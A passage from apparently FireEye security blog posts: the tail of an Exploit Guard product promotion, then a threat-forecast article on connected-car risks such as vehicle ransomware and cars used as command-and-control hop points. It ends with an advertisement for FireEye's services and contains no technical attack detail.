        HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

        Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

        Click here for more information about Exploit Guard technology.

        Connected Cars: The Open Road for Hackers

        As vehicles become both increasingly complex and better connected to the Internet, their newfound versatility may be manipulated for malicious purposes. Three of the most concerning potential threats looking ahead to the next few years are those posed by manipulating vehicle operation, ransomware and using vehicular systems as command and control (C2) infrastructure for illicit cyber activity.

        Car Hacking?

        Vehicles have come a long way in terms of the high-tech features and connectivity that come standard in most new models. Modern cars are controlled almost entirely by software, and many drivers don’t realize the most complex digital device they own may be in their driveway. Of the growing number of devices in the “Internet of Things” (IoT), vehicles are among the most significant additions to the global Internet. An ever-growing list of features—including web browsing, Wi-Fi access points, and remote-start mobile phone apps—enhance user enjoyment, but also greatly expand vehicles’ attack surface, rendering them potentially vulnerable to advanced attacks. During the past year especially, numerous proof-of-concept demonstrations have revealed connected-car vulnerabilities that malicious actors can exploit, ranging from unauthorized entry to commandeering the vehicle’s operation. Unfortunately, as consumer demand drives ever more features, the opportunities for compromise will increase as well.

        Ransomware

        The scourge of ransomware has so far affected thousands of systems belonging to ordinary individuals, hospitals, and police stations. A vehicle’s increased connectivity, ever-expanding attack surface, and high upfront cost make them attractive ransomware targets. In contrast to ransomware that infects ordinary computer systems, vehicles are more likely susceptible to ransomware attacks when their disablement causes knock-on effects.

        For example, where a single driver might be able to reinstall his car’s software with the help of a mechanic to remedy a ransomware infection, a group of vehicles disabled on a busy highway could cause far more serious disruption. Victims or municipal authorities may have little choice but to pay the ransom to reopen a busy commuting route. Alternatively, a logistics company might suddenly find a large portion of its truck fleet rendered useless by ransomware. The potential for lost revenue due to downtime might pressure the company to pay the ransom rather than risk more significant financial losses.

        Malicious C2 and Final Hop Points

        One effective law enforcement tactic in countering cyber espionage and criminal campaigns is identifying, locating and seizing the systems threat actors use to route malicious traffic through the Internet. Since many modern vehicles can be better described as a computer attached to four wheels and an engine, their mobility and power present challenges to this means of countering threat activity. We have already witnessed malware designed to hijack IoT devices for malicious purposes; vehicular systems’ greater computing power, compared to connected home thermostats, can significantly enhance their value as a C2 node.

        Locating vehicles used to route malicious traffic would present a major challenge to law enforcement investigation, largely due to their mobility. We have not yet observed threat actors using connected vehicle systems to route malicious traffic, but it is most likely that a vehicle would be used as a final hop point to the intended target network. The perpetrators may use the vehicle only once, choosing to hijack the connectivity of a different vehicle on their next operation, and so on. This ever-changing roster of potential last-hop nodes situated on highly mobile platforms may allow threat actors to elude law enforcement for extended periods of time.

        Understanding the Risk Landscape

        The impact of cyber threats is most often considered in financial terms—the cost of a breach, whether direct financial losses or indirect costs of investigation, remediation, and improved security. As computers increasingly control vehicles, among other critical devices and systems, the potential for malfunction or manipulation that causes human harm rises dramatically. Automobile manufacturers may face greater liability, not only for the car’s physical components, but its software as well. How long before vehicles need a “cyber security rating,” similar to that awarded for crash testing and fuel economy?

        These new risks point to the need for automotive manufacturers and suppliers to not only ensure the traditional operational safety of their vehicles, but to also secure both the vehicle's operations and occupant privacy. This requires an ongoing understanding about the nature of threats and vulnerabilities in a rapidly evolving landscape, and building in strong proactive security measures to protect against these risks. FireEye explores these risks to automotive safety in our latest FireEye iSIGHT Intelligence and Mandiant Consulting report: Connected Cars: The Open Road for Hackers. The report is available for download here.

        FireEye Capabilities

        FireEye combines our industry leading threat intelligence, incident response and red team capabilities with our ICS domain expertise to help the automotive industry improve their prevention, detection and response capabilities. FireEye’s Red Team Operations and Penetration Tests can provide firms in the automotive industry experience responding to real-world attacks without the risk of negative headlines. A one-time risk assessment is not enough, because threat attackers are consistently evolving.

        For more information, contact FireEye.

        FireEye iSIGHT Intelligence’s Horizons Team conducts strategic forecasting to anticipate risks posed by emerging technologies and geopolitical developments, helping clients and the public better assess their exposure to a dynamic cyber threat landscape.